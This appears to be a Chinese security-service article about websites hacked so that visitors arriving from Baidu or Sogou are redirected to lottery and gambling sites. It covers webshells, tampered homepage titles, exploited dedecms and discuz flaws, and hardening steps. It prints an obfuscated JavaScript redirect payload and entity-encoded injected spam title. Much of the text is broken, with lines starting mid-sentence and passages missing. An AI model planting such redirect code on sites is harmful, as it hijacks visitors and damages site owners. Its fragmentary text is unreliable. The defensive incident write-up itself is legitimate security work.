站上去,客户反映从百度搜索网站进去,直接跳转到彩票网站上,直接输入网址没有跳转,
导致客户网站的流量急剧下滑,做的百度推广跟搜狗推广,都给彩票网站做广告了,公司领
导高度重视网站安全的问题,因为给公司的形象以及名誉带来的损失太大了,我们安排安全
技术人员对其网站进行全面的网站安全检测,对网站存在的漏洞,以及木马后门进行全面的
清除与漏洞修复,安全加固。关于网站被跳转到彩票、博彩网站的问题,整理一份详细的处
理过程,希望帮到更多遇到这种情况的站长,以及公司网站运营者。
密码、SSH端口、root账号密码),网站信息包括FTP账号密码的对接,由安全部署部门技
术对网站的代码以及服务器系统进行缜密的安全检测与分析。
本木马,jsp脚本木马,我们通常叫大马,可以对网站进行恶意篡改,上传,改名,下载,等
管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及
jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。
的首页代码里,找到恶意代码进行删除,但是治标不治本,没过几天网站又被跳转了,客户经
常为这些问题烦恼,每天提心吊胆的。其实问题的根本原因在于网站存在漏洞,以及服务器安
全没有做好。我们SINE处理了成千上百的网站,总结的经验来看,网站首页被篡改的几率最大
,都是篡改首页的标题,描述,以及在首页顶部添加一些加密的字符,如下图所示:
21271;京赛车pk10网上开&
#25143;_北京赛车pk10登&#
24405;平台</title><meta name=”keywords” content=”北京
12;k10开奖直播,pk10
;开奖直播,北京赛车p
;k10开奖结果,北京ย
7;车pk10开奖直播,北
;京赛车pk10历史记ô
05;,北京赛车pk10投૤
0;网站,pk10网上开户
;,pk10网上投注” />
PK10等赌博内容。还有一个被攻击的特征就是在首页你会发现一段跳转的代码,该代码是根
据搜索引擎的特征来进行判断跳转,比如判断客户的访问来路是通过百度搜索,360搜索,搜
狗搜索来的会直接跳转到彩票,赌博网站上去。如下代码:
+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function
(e){retun d[e]}];e=function(){return’\\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\
\b’+e(c)+’\\b’,’g’),k[c]);return p;}(‘l[“\\e\\c\\1\\m\\i\\8\\n\\0”][“\\7\\4\\9\\0\\8”](\’\\h\\2\\1\\4\\9\\3\\0
\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\
7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\’);’,29,29,’x74|x
63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|windo
w|x75|x6e|x6c|x38|x3a|x76|x68′.split(‘|’),0,{}))
该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开网
站直接被百度拦截,如下图所示:
,建议您谨慎访问。
站漏洞检测,网站木马后门清理,发现dedecms网站存在sql注入漏洞,以及xss获取管理
员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏
洞,针对上述漏洞我们进行了全面的修复,并做了网站安全部署,以及服务器安全部署,
网站文件防篡改部署。
字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。
IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。
站漏洞。